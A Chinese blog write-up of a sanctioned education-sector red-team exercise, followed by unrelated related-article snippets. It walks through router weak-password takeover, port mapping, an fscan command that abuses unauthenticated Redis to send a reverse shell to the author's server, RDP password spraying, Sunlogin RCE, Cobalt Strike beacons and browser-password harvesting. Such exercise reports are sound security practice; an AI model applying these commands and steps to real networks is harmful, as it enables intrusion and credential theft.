『攻防』记一次EDU攻防演练

简介: 『攻防』记一次EDU攻防演练

背景

记一次EDU攻防,来之前还是有点怂的,因为前段时间刚打了其它地方EDU感受了一波,小部分目标有重合好难打啊(Too vegetable),不是很正式的感觉队伍也不多,目标分下来混战打,拿到目标表一看。

b8a08dcf2a85a9d98e27c953ca832174_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

我敲了一大半的内网地址大部分都是些视频监控系统

信息收集

拿到目标表之后就是信息收集了,挑了几个目标fscan快速识别一波资产没啥东西呀,web页面有个内网地址泄露记一下,可以确定这个ip是在服务器段的,我还没进去内网呢要这破ip干嘛

上超级弱口令检测工具扫一波弱口令,telnet口令爆破到一个h3c设备口令,成功登陆到设备是个管理员权限,开启web访问看了下有ssl vpn功能和授权,那么可以直接建ssl vpn把内网打通。

254ce4fbada41cb297058dcccfb254ba_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

菜狗不会配啊,只有抓苦力找L师傅给我看看了

0ede4fe6eb904e627f99e1b2e72af69a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

白嫖L师傅干活给了个设备型号让他去翻一波手册,吃完饭回来L师傅很自信跟我说你的需求我清楚了不就把内网放出来嘛(简简单单),L师傅远程我电脑telnet命令行配置界面敲下神秘代码(高手高手),然后piapia打脸哈哈哈

42f3b7abe3360f3b03a128c4e08df5f4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

设备太老了第一条命令就配不上,网上能找到的手册都是命令行配置,web界面配置L师傅看了半天也没整起,ssl vpn端口是通了但是连不上啊,吐槽了一波L师傅不靠谱,piapia打脸的L师傅试图解释一波(这设备出厂我都还在上初中怎么这设备还不退市啊),浪费一个小时时间没搞出来已经晚上一点了,睡觉吧明天找c师傅帮忙看看。

93488c031f5ceaca37a5ceb969134281_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

第二天找c师傅看了一下也搞不上敲了这下咋办啊,设备有telnet、ping功能,看了下设备上路由表确定了有2、3、5、6网段,telnet测试了一波网段一头一尾的IP,根据端口开放情况确定了2网段都是些服务器、3网段没法确定、5网段应该也是部分服务器段还有些无线ap设备。

72608e40b7125473a4be784813275025_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

通过telnet登陆到5网段的无线AP,可以执行部分命令,如ifconfig、ps -aux,其它命令都被屏蔽了,web界面比较简单没有什么功能,没有找到相关的漏洞。

b1c15d6101f6a4a15ad6a248a8b17784_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

翻了下官网的产品手册,看到一个无线网关的设备手册里面功能有vpn功能,那如果能找到这个无线网关设备不就可以做个vpn了吗

1b6706e563ac95cdb9ff7d9c5b1e3791_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

找了一圈没找到无线网关,放弃了,还是想想其他办法吧。现在我们手上有外网路由器的管理权限还有内网无线ap的权限,外网路由器可以telnet、ping探测IP和端口存活、nat端口映射。

那现在我们只有笨方法了,试试运气去探测内网的脆弱端口如22、1433、3389、6379、7001,说干就干,之前在信息收集的时候确定了靶标IP段在2段,那么我们直接按照靶标的IP前后去探测上面的脆弱端口,如果端口开放那么我们就在路由器上做个映射到公网上面。

简单探测了一波22端口写好nat配置到路由器上面先爆破一下

39f4be40d44baa94fb41f899e37f5595_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

突破口

人麻了,一个弱口令都没有,IP继续往前推探测6379端口,发现一个redis服务。

97c6c62e408f213066942fb1884658a5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

总算找到一个可以打的端口,这里在华三路由器telnet过去我不知道为啥我输入info没有返回未授权的信息,映射到外网输入info是直接返回未授权,直接端口映射到外网直接用fscan打一下。

799663a71f338dd89c72467a52e247b5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

芜湖,fscan创建个计划任务弹到vps上面。

fscan_amd64.exe -h *.*.*.* -p 6379 -rs *.*.*.*:1234

等待获取到shell

042368440b92e8709d2d7e4fbe0d902a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

芜湖,冲冲冲

2fe15c1b45c0d65e874d64072ba5c370_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

内网横向

拿到了内网机器权限,直接开冲,先上一波fscan撞一波之前我们收集到的密码。

fscan_amd64.exe -h *.*.*.*/16 -pa 3389 -pwd ***** -np

运气比较好,撞密码撞到了两个机器,上个向日葵rce继续冲。

c563bddf4f53387b6ce92321a1c1c1d7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

内网翻出来一堆向日葵rce,能正常执行命令的就一台,难受了呀,powershell上线到cs上面,加账号远程到服务器,常规操作翻文件、浏览器密码、找内网管理员IP这些。

数据库账号,成功连接到数据库。

0effe1c027d496825a8c4f1f351223a2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

QQ文件里面有向日葵远程码,可惜了连接不上。

8d7282fcb091fd77c62c05f520e9d0d0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

在日志里面看登陆日志确定管理员IP,探测了下管理员地址不在线,上线另外两个rdp爆破出来的机器,浏览器保存了上网行为管理密码,直接登陆到后台了。

f51fcc14cbc26c0494af1b246d50c3e2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

刚才fscan扫描出一些交换机设备,尝试用同样的密码登陆,拿到了8台交换机权限。

6ed8bc73696fe2991ea8d74f56a95669_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

网络设备分数上限2k,之前无线ap已经把分数打满了,交了也是白交,继续看靶标系统和虚拟化平台,没有一个能可以打的,刚才的设备万能密码也没用。

5f06ce11a71192ffac182287da6ff294_640_wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1.jpg

kscan再扫描下,发现一些应该是移动终端设备,adb直接连接上去大概60台左右算物联网分数上限直接满了,靶标拿不下难受啊,就这样吧交报告溜了溜了。

总结

这次攻防整体的反思,外网打点信息收集尽量宽泛仔细一些,在现场打压力还是大的打不出来东西就是在坐牢,和队伍里师傅第一次协作不是很好没有沟通好打哪个目标好点,师傅第一次打也很懵逼,我打的多之前都是旁边辅助混子哈哈哈,信息同步还是比较重要的,内网横向这块还得学啊太菜了太菜了,还有就是免杀和bypass av跟师傅们学了一波姿势,之前没弄过上不了线真是一脸懵逼,最后差个几千分结束了。

文章里面这个目标案例打的也不是像我写的这么顺利,在测试脆弱端口的时候人麻了,测试了有个一个多小时一个能打的都没有,中午去吃饭路上都想着回来写python脚本做telnet批量测试,吃饭回来坐在那摆烂随便测了下结果测出个redis未授权才撕开了一个口子。

还有就是打的时候一定不能把自己轴进去了,一定要多跟队伍里师傅沟通想法怎么做,多个人多种思路,一个点上浪费了太多时间一定要及时调整寻找其它突破点,这个在突破到内网那里我就很轴,当时我就想把ssl vpn建立起来但是就是建立不起来,c师傅喊我换个思路把端口映射出来打,最后想想确实在ssl vpn那块浪费太多时间,一定及时调整自己思路。

文章到此结束,写到这里还是觉得内容比较少不够精彩,纯当记录混个稿费吧哈哈哈,文章内容姿势比较少,师傅们多分享下外网打点、bypass av这块的文章,让弟弟也学习一下欢迎各位师傅们来交流。

相关文章
|
9月前
|
机器学习/深度学习 人工智能 安全
数据安全智能体:AI驱动的新一代企业数据安全防护范式
随着大语言模型(LLM)技术的快速演进,以及企业数字化转型的深入推进,传统的被动式数据安全防护体系已难以满足现代威胁的防御需求。国内首款数据安全智能体通过将生成式AI、自适应防护机制、多智能体协作等前沿技术融为一体,实现了从”人工堆砌”向”智能主动”的范式转变。
892 6
数据安全智能体:AI驱动的新一代企业数据安全防护范式
|
网络协议 算法 网络性能优化
【计算机网络】TCP 如何实现可靠传输
【计算机网络】TCP 如何实现可靠传输
525 6
|
3月前
|
人工智能 自然语言处理 安全
别让你的AI当"差不多先生"——Hermes 0.18+0.19双版本连更,把智能体从"会干活"推到了"能托付"
Hermes 0.18–0.19 版本聚焦“可信AI”,六大升级重塑人机协作:/goal 自我验证+持久化兜底确保任务真完成;/learn 技能蒸馏让AI持续积累经验;MoA多模型协商提升决策质量;冷启动提速80%、渲染优化14倍;Smart Approvals智能审批兼顾安全与效率;/journey记忆时间线+上下文压缩保障长期项目连贯性。真正实现“交办即安心”。
386 1
|
SQL 人工智能 自然语言处理
数据 + 模型 驱动 AI Native 应用发展
随着人工智能技术的飞速发展,从生成式人工智能(GenAI)到自主代理人工智能(Agentic AI)的演进,企业面临着构建 AI Native 应用的机遇与挑战。本文将深入探讨 AI 开发模式的转变、企业应用的挑战以及技术架构和开发工具的应用,旨在为读者提供一个全面的视角,以理解如何利用数据和模型驱动 AI Native 应用的发展。
589 0
|
9月前
|
运维 安全 API
钓鱼攻击之后,你的密码去了哪里?——一场横跨暗网、Telegram与企业内网的数据黑市追踪
凌晨三点,深圳工程师张磊突遭Azure账户异常登录警报,财务邮箱被悄然转发敏感邮件。这并非个案,而是2025年频发的钓鱼攻击缩影。调查显示,钓鱼数据90秒内经Telegram机器人传至黑产链,催生跨国“数据黑市”。从伪造页面到撞库洗号,从企业邮箱劫持到商业邮件欺诈,攻击已形成工业化链条。防御需技术与意识并重:个人应禁用弱密码、启MFA,企业须建纵深防护体系。安全无终点,唯有持续对抗。
615 2
|
11月前
|
数据采集 安全 数据挖掘
Python字符串统计:从基础到进阶的实用指南
本文系统介绍Python字符串统计技巧,涵盖长度计算、字符与单词计数、子串查找、频率分析及文件处理等场景,结合代码示例讲解基础方法与进阶优化,助你高效应对数据分析、文本处理等实际需求。
1151 0
|
Python
pip安装包报错Could not find a version that satisfies the requirement pymysql (from versions: none)
pip安装包报错Could not find a version that satisfies the requirement pymysql (from versions: none)
1714 1
|
SQL 监控 安全
DVWA Authorisation Bypass 通关解析
DVWA Authorisation Bypass 通关解析
|
机器学习/深度学习 数据可视化 开发者
Jupyter Notebook使用技巧:提升编程效率的最佳实践
Jupyter Notebook使用技巧:提升编程效率的最佳实践
891 1
Windows中如何查看被占用的端口、杀掉对应的进程
这篇文章介绍了在Windows系统中如何查看被占用的端口号以及如何杀掉占用端口的进程,包括使用命令提示符的`netstat -ano | findstr 端口号`命令查找进程PID,然后通过任务管理器或`taskkill /PID PID号`命令来结束进程。
Windows中如何查看被占用的端口、杀掉对应的进程